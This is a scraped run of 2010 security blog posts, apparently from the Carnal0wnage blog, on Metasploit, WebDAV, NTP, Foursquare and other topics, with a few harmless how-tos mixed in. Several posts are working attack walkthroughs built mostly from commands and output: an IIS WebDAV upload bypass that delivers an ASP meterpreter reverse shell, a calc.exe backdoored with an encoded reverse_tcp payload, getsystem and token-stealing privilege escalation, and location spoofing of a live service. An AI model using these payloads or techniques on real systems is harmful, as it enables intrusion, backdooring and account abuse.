If you try to upload an .asp you'll get a 403 forbidden or if you try to COPY/MOVE a .txt to .asp you'll get a forbidden. :-(

Thankfully there is a "feature" of 2k3 that allows you to upload evil.asp;.txt and that will bypass the filter.

So we generate out evil.asp file using msfpayload and msfencode, you could also use any other asp shell too...

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.6.94 LPORT=443 R |
./msfencode -o tcp443meterp.asp
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

upload it and rename it

dav:/davaroo/> put tcp443meterp.asp tcp443meterp.txt
Uploading tcp443meterp.asp to `/davaroo/tcp443meterp.txt':
Progress: [=============================>] 100.0% of 314810 bytes succeeded.
dav:/davaroo/> copy tcp443meterp.txt tcp443meterp.asp;.txt
Copying `/davaroo/tcp443meterp.txt' to `/davaroo/tcp443meterp.asp%3b.txt':  succeeded.
dav:/davaroo/> exit

now you can browse to the page at ip/tcp443meterp.asp;.txt and get your shell

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.6.94:443
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.6.94
[*] Meterpreter session 1 opened (192.168.6.94:443 -> 192.168.242.134:49306)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: 6
meterpreter > sysinfo
Computer: WebDAVRulez
OS      : Windows .NET Server (Build 3790, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter > run migrate -f notepad.exe
[*] Current server process: svchost.exe (1792)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 312
[*] New server process: notepad.exe (312)
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE

What I ran into was that your shell came back with a less than desirable privilege (Network Service). You'll have to work the local angle to elevate but at least you have a shell.

more info here: http://blog.metasploit.com/2009/12/exploiting-microsoft-iis-with.html

Resources:
cadaver: http://www.webdav.org/cadaver/
DAVtest: http://security.sunera.com/2010/04/davtest-quickly-test-exploit-webdav.html
Ryan Linn's port of DAVtest to metasploit: http://trac.happypacket.net/browser/msfmods/trunk/modules/auxiliary/scanner/http/webdav_test.rb

Tags: webdav webdavtest davaroo ryan-linn metasploit iusr cadaver

April 26, 2010
14:13
Android Emulators with Android Market
» ‎ Carnal0wnage

I wanted to be able to view/sniff some traffic from my android phone. Mostly to see how "closed" the gowalla checkin api was (not very).

The first couple suggestions were to connect the phone to wifi and checkin. To do this from the comfort of my own home meant checking in from home and I didn't really want to do that.

Installing the android emulator is pretty straightforward, the only problem is that it doesnt come with the android market or the ability to easily(?) download apps to mess with.

After some googling I found this post:

http://tech-droid.blogspot.com/2009/11/android-market-on-emulator.html

This enabled me to get a working android emulator with android market place.

Go here and download the sdk for whatever system you are using, I'm on ubuntu...

You'll need to download some platforms as the sdk doesnt come with much of anyting by default.

To launch the Android SDK and AVD Manager on Windows, execute SDK Setup.exe, at the root of the SDK directory. On Mac OS X or Linux, execute the android tool in the /tools/ folder. This will start the GUI (least on linux --I dont care about windows)

Go to available packages and download sdk package for Android 1.5 or 1.6. I used 1.5

over in installed packages you should see the sdk when its all done.

Go here and download the system image for 1.5 or 1.6

Create an AVD (1.5 or 1.6). populate it how you want, I gave it one of everything on the hardware.

After you create the avd, you should have an avd folder in your .android folder. Something like .android/avd/[avdname]

Copy the system.img file you downloaded from HTC in there.

start that puppy up

If you went the 1.5 route you are probably getting a slide keyboard to open thing. Hit CTRL+F11 to change the orientation of the phone to "slide it open"

You now have a pretty much fully functional android to muck around with and now any communications with any apps should be sniffable in wireshark.

What about the GPS? The debugger gives you the ability to set the GPS manually so you can be anywhere you want to be :-)

additional reading:
https://www.isecpartners.com/files/iSEC_Android_Exploratory_Blackhat_2009.pdf

-CG
Tags: sdk download android mac-os sdk-package mac-os-x couple-suggestions
April 13, 2010
9:33
Decompiling Jar Files
» ‎ Carnal0wnage

just some notes for later on how to decompile a jar file

first unzip the .jar

cg$ unzip javatest3.jar
Archive: javatest3.jar
creating: META-INF/
inflating: META-INF/MANIFEST.MF
inflating: SiteError.class
inflating: evil.class
...

from there use jad to decompile

cg$ ./jad -r -ff -s java javatest/SiteError.class Parsing javatest/SiteError.class... Generating SiteError.java

thats it, now you can read the code.
Tags: siteerror javatest jar meta jar-archive java
April 05, 2010

Permalink for 'Network Time Protocol (NTP) Fun'

19:12

Network Time Protocol (NTP) Fun

» ‎ Carnal0wnage

@hdmoore released a new auxiliary module a few days ago that went along with his NTP research he has been doing.


msf auxiliary(ntp_monlist) > set RHOSTS time.euro.apple.com

RHOSTS => time.euro.apple.com
msf auxiliary(ntp_monlist) > info

    Name: NTP Monitor List Scanner
 Version: 8432
 License: Metasploit Framework License (BSD)
    Rank: Normal

Provided by:
hdm 

Basic options:
Name       Current Setting      Required  Description
----       ---------------      --------  -----------
BATCHSIZE    256                  yes       The number of hosts to probe in each set
CHOST                             no        The local client address
RHOSTS       time.euro.apple.com  yes       The target address range or CIDR identifier
RPORT        123                  yes       The target port
THREADS      1                    yes       The number of concurrent threads

Description:
Obtain the list of recent clients from an NTP server

msf auxiliary(ntp_monlist) >

And when you run the module, it looks a bit like this:


msf auxiliary(ntp_monlist) > run

[*] Sending probes to 17.72.255.11->17.72.255.11 (1 hosts)
[*] 17.72.255.11:123 86.138.33.93:56042 (17.72.255.11)
[*] 17.72.255.11:123 188.192.151.225:52210 (17.72.255.11)
[*] 17.72.255.11:123 81.167.222.18:36866 (17.72.255.11)
[*] 17.72.255.11:123 89.247.73.227:63929 (17.72.255.11)
[*] 17.72.255.11:123 80.39.165.55:123 (17.72.255.11)
[*] 17.72.255.11:123 82.19.218.58:123 (17.72.255.11)
[*] 17.72.255.11:123 82.123.121.154:123 (17.72.255.11)
[*] 17.72.255.11:123 90.207.190.29:123 (17.72.255.11)
[*] 17.72.255.11:123 193.52.24.125:38377 (17.72.255.11)
[*] 17.72.255.11:123 91.10.239.87:64361 (17.72.255.11)
--SNIP--
[*] 17.72.255.11:123 89.241.98.89:27213 (17.72.255.11)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ntp_monlist) >

Other neat shiz...

Sensepost put out a cool post talking about some of the other neat queries you can do using the ntp tools.

http://www.sensepost.com/blog/4552.html

Some quick research into NTP(from ww.ntp.org) revealed that NTP servers allow you to perform a bunch of commands that are secondary to time keeping. You can easily play with these using the ntpdc client program eg. 'ntpdc target.ntp.server'. Some of these commands include:
listpeers - List the peers(NTP servers) for the time server
showpeer - Give time keeping info about a specific peer time server
peers - List peers and some basic time keeping info
sysstats - Info regarding ntp daemon itself

$ ntpq -c readvar time.euro.apple.com
assID=0 status=0684 leap_none, sync_ntp, 8 events, event_peer/strat_chg,version="ntpd 4.2.2@1.1532-o Mon Sep 24 
01:42:27 UTC 2007 (1)", processor="i386", system="Darwin/9.6.0", leap=00, stratum=2, precision=-20, rootdelay=0.682, rootdispersion=10.719, peer=8126, 
refid=17.72.133.54, reftime=cf648929.538400d4  Mon, Apr  5 2010 12:07:05.326, poll=7, clock=cf648a97.2560d91c  Mon, Apr  5 2010 12:13:11.146, state=4, offset=0.149, frequency=43.608, jitter=0.058, noise=0.041, stability=0.000, tai=0

$ ntpdc -c peers time.euro.apple.com
remote           local      st poll reach  delay   offset    disp
=======================================================================
*time1.euro.appl 17.72.255.11     1  128  377 0.00069  0.000155 0.07887
=time2.euro.appl 17.72.255.11     1  128  377 0.00061  0.000177 0.08919
=17.254.0.49     17.72.255.11     1  128  377 0.14996  0.000237 0.06696
=TrueTime.asia.a 17.72.255.11     1  128  377 0.31990 -0.000027 0.04962
=A17-106-100-13. 17.72.255.11     2  128    0 0.17369  0.007904 3.99217
+time4.euro.appl 17.72.255.11     2   32  376 0.00015 -0.000151 0.04303

$ ntpdc -c listpeers time.euro.apple.com
client    time1.euro.apple.com
client    time2.euro.apple.com
client    17.254.0.49
client    TrueTime.asia.apple.com
client    A17-106-100-13.apple.com
sym_active time4.euro.apple.com

Of course if you just want to do the monlist yourself you can...

$ ntpdc -c monlist time.euro.apple.com
remote address          port local address      count m ver code avgint  lstint
===============================================================================
94.96.201.223.dynamic. 50951 17.72.255.12           5 3 4      0      0       0
static-86-51-114-108.m   316 17.72.255.12          25 3 4      0      0       0
207-38-154-68.c3-0.ave 40311 17.72.255.12           7 3 4      0      0       0
62-177-171-130.dsl.bbe   501 17.72.255.12           1 3 4      0      0       0
bb6a37ee.virtua.com.br   123 17.72.255.12           1 3 4      0      0       0
p4FC7545E.dip.t-dialin   123 17.72.255.12           1 3 4      0      0       0
--SNIP--

Still Interested?
http://www.ntp.org/documentation.html

Tags: euro ntp time darwin network-time-protocol target-address shiz metasploit

17:59
LearnSecurityOnline Advanced Penetration Testing Course
» ‎ Carnal0wnage

Everyone that knows me knows that I'm a huge LSO supporter. I wouldn't be where I am today without everything I learned from Joe and LearnSecurityOnlin e.

He let me get a preview of his new Advanced Penetration Testing (APT): Pentesting High Security Environments course.

The syllabus is available here:
http://www.learnsecurityonline.com/component/content/article/3-admin/222-apt

I got to look at a good chunk of the labs and its top notch training, plus you get it live from Joe who is by far one of the best instructors out there.

Of particular interest to me is the attacking from the web section:
Attacking From the Web

1. XSS to command-shell

2. SQL Injection to command-shell
MS-SQL
MySQL
Oracle

3. File Handling to command-shell

File Upload to command-shell
RFI to command-shell
LFI to command-shell

Course Dates
Course dates are 17th - 21st May 2010 Greenbelt Maryland
http://www.learnsecurityonline.com/component/content/article/3-admin/222-apt

2 Day version at Brucon 22-23 September 2010
http://2010.brucon.org/index.php/Training_1#description
Tags: security-environments mysql-oracle apti Learn security online
March 24, 2010
11:38
Msfencode a Msfpayload Into An Existing Executable
» ‎ Carnal0wnage

Very cool update to metasploit today:

http://www.metasploit.com/redmine/projects/framework/repository/revisions/8896

This update allows you to msfencode a msfpayload into an existing executable and the new executable still function like the original. So if you inject into calc.exe you get calc.exe and your backdoor.

let's see the new msfencode options:

~/trunk$ ./msfencode -h

Usage: ./msfencode

OPTIONS:

-a The architecture to encode as
-b The list of characters to avoid: '\x00\xff'
-c The number of times to encode the data
-e The encoder to use
-h Help banner
-i Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m Specifies an additional module search path
-n Dump encoder information
-o The output file
-p The platform to encode for
-s The maximum size of the encoded data
-t The format to display the encoded buffer with (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war)
-x Specify an alternate win32 executable template

Let's make our new backdoored executable.

~/trunk$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.210.11 R | ./msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)

Get the backdoored exe on the other box and execute it. We have a functional calc.exe and our shell.

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.210.11
LHOST => 192.168.210.11
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.210.11:4444
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 3 opened (192.168.210.11:4444 -> 192.168.210.11:51695)

Keep in mind that you'll still need to migrate away from the backdoored executable process because if they close the exe you lose your shell.

meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > run migrate explorer.exe
[*] Current server process: calc_backdoor.exe (3360)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 1592
[*] New server process: Explorer.EXE (1592)
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getpid
Current pid: 1592
meterpreter >
Tags: exe msfencode meterpreter shikata-ga-nai raw-ruby module-search metasploit
March 19, 2010
6:56
F**king With Foursquare Goes MSF Style
» ‎ Carnal0wnage

mindless foursquare fun goes metasploit style...

msf > use auxiliary/admin/foursquare
msf auxiliary(foursquare) > info

Name: Foursquare Location Poster
Version: $Revision:$
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
CG

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD password yes foursquare password
Proxies no Use a proxy chain
RHOST api.foursquare.com yes The target address
RPORT 80 yes The target port
USERNAME username yes foursquare username
VENUEID 185675 yes foursquare venueid
VHOST no HTTP server virtual host

Description:
Fuck with Foursquare, be anywhere you want to be by venue id

References:
http://groups.google.com/group/foursquare-api
http://www.mikekey.com/im-a-foursquare-cheater/

msf auxiliary(foursquare) >
msf auxiliary(foursquare) > set USERNAME notmyusername@host.com
USERNAME => notmyusername@host.com
msf auxiliary(foursquare) > set PASSWORD notmypassword
PASSWORD => notmypassword
msf auxiliary(foursquare) > set VENUEID 9186
VENUEID => 9186

msf auxiliary(foursquare) > run

[*] HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Date: Fri, 19 Mar 2010 13:59:28 GMT
Content-Length: 1311
Server: nginx/0.7.64
Connection: keep-alive

Fri, 19 Mar 10 13:59:28 +0000OK! We've got you @ Washington Monument. This is your 1st checkin here!9186Washington Monument79199Parks & Outdoors:Sculpture SNIP

[*] Auxiliary module execution completed

You can get the module here:
http://code.google.com/p/carnal0wnage/source/browse/trunk/msf3/modules/auxiliary/admin/random/foursquare.rb
Tags: foursquare password msf washington washington-monument f-king google
March 18, 2010
18:13
Getting Started With IPv6
» ‎ Carnal0wnage

Getting IPv6 up and running

Install the miredo package:
$ sudo apt-get install miredo

After this command, you should see an IPv6 address beginning with "2001:0:" in your network settings (use 'ifconfig'). If so, you're connected to the IPv6 world.

Remove miredo system startup links:
$ sudo update-rc.d -f miredo remove

Usage:

$ sudo /etc/init.d/miredo {start|stop|restart|reload|force-reload}

If miredo is running you should have another interface called "teredo".
You can display it with the following command:

$ ifconfig teredo

To test if you can reach the IPv6 network, try the following:
carnal0wnage ~: ping6 ipv6.google.com PING ipv6.google.com(iw-in-x63.1e100.net) 56 data bytes 64 bytes from iw-in-x63.1e100.net: icmp_seq=1 ttl=55 time=284 ms 64 bytes from iw-in-x63.1e100.net: icmp_seq=4 ttl=55 time=100 ms 64 bytes from iw-in-x63.1e100.net: icmp_seq=5 ttl=55 time=108 ms --- ipv6.google.com ping statistics --- 7 packets transmitted, 3 received, 57% packet loss, time 6000ms rtt min/avg/max/mdev = 100.005/164.009/284.016/84.920 m

carnal0wnage ~: ping6 www.ipv6.org PING www.ipv6.org(igloo.stacken.kth.se) 56 data bytes 64 bytes from igloo.stacken.kth.se: icmp_seq=1 ttl=58 time=472 ms 64 bytes from igloo.stacken.kth.se: icmp_seq=2 ttl=58 time=156 ms 64 bytes from igloo.stacken.kth.se: icmp_seq=3 ttl=58 time=156 ms 64 bytes from igloo.stacken.kth.se: icmp_seq=5 ttl=58 time=156 ms 64 bytes from igloo.stacken.kth.se: icmp_seq=6 ttl=58 time=156 ms --- www.ipv6.org ping statistics --- 7 packets transmitted, 5 received, 28% packet loss, time 6000ms rtt min/avg/max/mdev = 156.009/219.212/472.027/126.408 ms

carnal0wnage ~: traceroute6 www.ipv6.org traceroute to www.ipv6.org (2001:6b0:1:ea:202:a5ff:fecd:13a6), 30 hops max, 40 byte packets 1 * * * 2 terminator.csbnet.se (2a02:9a0:0:1::193) 612.035 ms 612.035 ms 612.035 ms 3 c2sth-ge-5-0-8.sunet.se (2001:6b0:dead:beef:2::3a9) 648.037 ms 648.037 ms 648.037 ms 4 a1sth-kth.sunet.se (2001:6b0:dead:beef:2::2c6) 636.036 ms 636.036 ms 636.036 ms 5 2001:6b0:1:1d20::2 (2001:6b0:1:1d20::2) 736.042 ms 736.042 ms * 6 * 2001:6b0:1:1200::3 (2001:6b0:1:1200::3) 324.018 ms 324.018 ms 7 igloo.stacken.kth.se (2001:6b0:1:ea:202:a5ff:fecd:13a6) 160.009 ms 156.009 ms 156.009 ms

Changing teredo server:

sudo vi /etc/miredo.conf ServerAddress teredo.ipv6.microsoft.com sudo /etc/init.d/miredo restart

Windows XP

Install
Open the Terminal with Start -> Run -> cmd

netsh interface ipv6 install netsh interface ipv6 set teredo client

Uninstall

netsh interface ipv6 uninstall

Vista

Install
IPV6 and Teredo is enabled per default. You can get into the settings by going into the preferences for an network interface. "Obtain an IPv6 address automatically" should do the trick.

Uninstall
Add this registry value ("DWORD") set to 0xFF (long line, double-click, and copy):

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\DisabledComponents

Or save the two lines in a .reg file and double-click it:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters] "DisabledComponents"=dword:000000ff

You can also go to the interface properties of an network interface and deselect the IPv6 protocol for that interface. To enable IPv6 again, replace dword:000000ff above with dword:00000000.

Ref:
http://pugio.net/2007/07/howto-enable-ipv6-the-teredo-w.html
https://blueimp.net/linux/howto/ipv6-teredo.html
Tags: interface ipv time ping-statistics force-reload beef-2 IPv6
March 15, 2010
17:28
F**king with Foursquare
» ‎ Carnal0wnage
Foursquare is pretty neat. You can post you location via phone or browser and get nifty badges for different things or become a mayor of a place if you check in to that location the most. Its also exceedingly easy to cheat at.

I only casually mentioned the idea of cheating to @Jack_Mannino and within a few minutes of emailing him the link to the API he was already traveling the globe at record speed.

Foursquare even has a nifty and pretty easy to understand API here:
http://groups.google.com/group/foursquare-api/web/api-documentation

The simplest thing you can do is checkin and post your location by vid or venue.

URL: http://api.foursquare.com/v1/checkin
Formats: XML, JSON
HTTP Method(s): POST
Requires Authentication: Yes
Parameters:
- vid - (optional, not necessary if you are 'shouting' or have a venue name). ID of the venue where you want to check-in
- venue - (optional, not necessary if you are 'shouting' or have a vid) if you don't have a venue ID or would rather prefer a 'venueless' checkin, pass the venue name as a string using this parameter. it will become an 'orphan' (no address or venueid but with geolat, geolong)
- shout - (optional) a message about your check-in. the maximum length of this field is 140 characters
- private - (optional). "1" means "don't show your friends". "0" means "show everyone"
- twitter - (optional, defaults to the user's setting). "1" means "send to Twitter". "0" means "don't send to Twitter"
- facebook - (optional, defaults to the user's setting). "1" means "send to Facebook". "0" means "don't send to Facebook"
- geolat - (optional, but recommended)
- geolong - (optional, but recommended)
So a sample request would look like:

POST /v1/checkin?vid= HTTP/1.1
Authorization: Basic
Host: api.foursquare.com
Proxy-Connection: Keep-Alive
Content-Length:

twitter=1&facebook=0

It being a POST you'll have to write some code to handle the Content-Length or use Burp Repeater or Metasploit.

Have fun traveling the globe from your living room.

Tags: vid foursquare venue jack venue-name proxy-connection setting-1
February 25, 2010
6:33
VMWare Directory Traversal Metasploit Module
» ‎ Carnal0wnage

Since everyone else is releasing code to check for/exploit the vmware server/esx/esxi directory traversal vulnerability I pushed up my checker module to the metasploit trunk as an auxiliary scanner module.

If you want to just download a full guest host check out:
GuestStealer -- http://www.fyrmassociates.com/tools/gueststealer-v1.1.pl

or the

nmap script -- http://www.skullsecurity.org/blog/?p=436

I don't feel like re-implementing it and I for sure don't want anything ever auto-downloading several gigabytes of information for me, so if you want that functionality write it or use the above tools. Gueststealer works great.

Vulnerability References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3733
http://www.vmware.com/security/advisories/VMSA-2009-0015.html

The module:
The module is simple enough. By default it checks for:

FILE /etc/vmware/hostd/vmInventory.xml

If it receives a 200 to the traversal string and file it says its vulnerable. If you want to see the output of the file you can uncomment the following line from the code:

#print_status("Output Of Requested File:\n#{res.body}")

reload the module, then change the file to what you want (example: set FILE /etc/shadow).

Since VMWare runs as root you pretty much have access to anything on the file system.

Tags: module vmware file directory-traversal-vulnerability scanner-module vmware-server metasploit
January 29, 2010
10:24
metasploit getsystem command
» ‎ Carnal0wnage

Shiny new hotness...

meterpreter > getuid
Server username: WINXPSP3\user **user is an admin, if not admin you can only use -t 4 or -t 0 which will iterate through all options**

meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem -h
Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:

-h Help Banner.
-t The technique to use. (Default to '0').
0 : All techniques available
1 : Service - Named Pipe Impersonation (In Memory/Admin)
2 : Service - Named Pipe Impersonation (Dropper/Admin)
3 : Service - Token Duplication (In Memory/Admin)
4 : Exploit - KiTrap0D (In Memory/User)

meterpreter > getsystem -t 1
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getsystem -t 2
...got system (via technique 2).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getsystem -t 3
...got system (via technique 3).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getsystem
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Hey I want user back!

meterpreter > getsystem -t 4
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

steal_token

meterpreter > steal_token -h
[-] Usage: steal_token [pid]

meterpreter > ps

Process list
============

PID Name Arch User Path
--- ---- ---- ---- ----
0 [System Process]
4 System x86 NT AUTHORITY\SYSTEM
368 smss.exe x86 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
592 csrss.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
616 winlogon.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
660 services.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
672 lsass.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
832 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
908 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1000 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1048 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1088 svchost.exe x86 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1440 spoolsv.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1560 explorer.exe x86 WINXPSP3\user C:\WINDOWS\Explorer.EXE
540 alg.exe x86 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
980 wscntfy.exe x86 WINXPSP3\user C:\WINDOWS\system32\wscntfy.exe
1360 wuauclt.exe x86 WINXPSP3\user C:\WINDOW

jetlib.sec » Items by CG

Feeds

Items by CG

Tags: devops

Tags: devops

Tags: devops

Tags: devops

Tags: devops

Tags: devops

Tags: devops

Tags: devops

Tags: devops

Tags: devoops

Tags: cloud

Tags: cloud

Tags: cloud

Tags: cloud

Tags: cloud

Tags: cloud

Tags: cloud

Tags: cloud

Tags: cloud

Tags: cloud

Tags: cloud

Tags: aws

Tags:

Tags:

Tags: mentoring

Tags: Pentesting

Tags:

Tags:

Tags: amplification attacks

Tags: mentoring

Tags: devoops

Tags: hack minecraft

Tags:

Tags: kanoOS kano computers

Tags: devoops

Tags: devoops

Tags: devoops

Tags: chef

Tags: devoops

Tags: metasploit

Tags: metasploit

Tags: blue teaming

Tags:

Tags:

Tags: brute-force nbsp-nbsp-nbsp-nbsp-nbsp rport mssql_ping

Tags:

Tags: twitter fun app bing-maps bing apps-tab maps Pentesting

Tags:

Tags: nbsp git php ron adam pillage wget index-files Pentesting

Tags:

Tags: nbsp group policy pentest encrypted-data x05 Pentesting

Tags:

Tags: nbsp wifi access internal-gps gps-position stolen-photo Wireless

Tags:

Tags: nbsp crypto mimikatz minesweeper current-user interesting-things Pentesting

Tags:

Tags: microsoft-windows-version blah-blah shell-ness powershell

Tags:

Tags: nbsp powershell payload metasploit payloads

Tags:

Tags: derbycon mubix media darren dirty-little-secrets tub-time little-secrets

Tags:

Tags: plug pwn ssh elite-models dns-queries sim-cards Pentesting

Tags:

Tags: nbsp lotus domino domino-hasheslink domino-scanner dawson bill william lotus-domino domino-servers lotus-script

Tags:

Tags: nbsp-nbsp-nbsp-nbsp-nbsp metasploit basename Pentesting

Tags:

Tags: intruder username timing ken juniper-ssl list-of-usernames ssl-vpns timing-options Pentesting

Tags:

Tags: axd file trace read-all trace-details separate-page root-directory Pentesting

Tags:

Tags: nbsp export nfs export-share portscanning sticky-bit Pentesting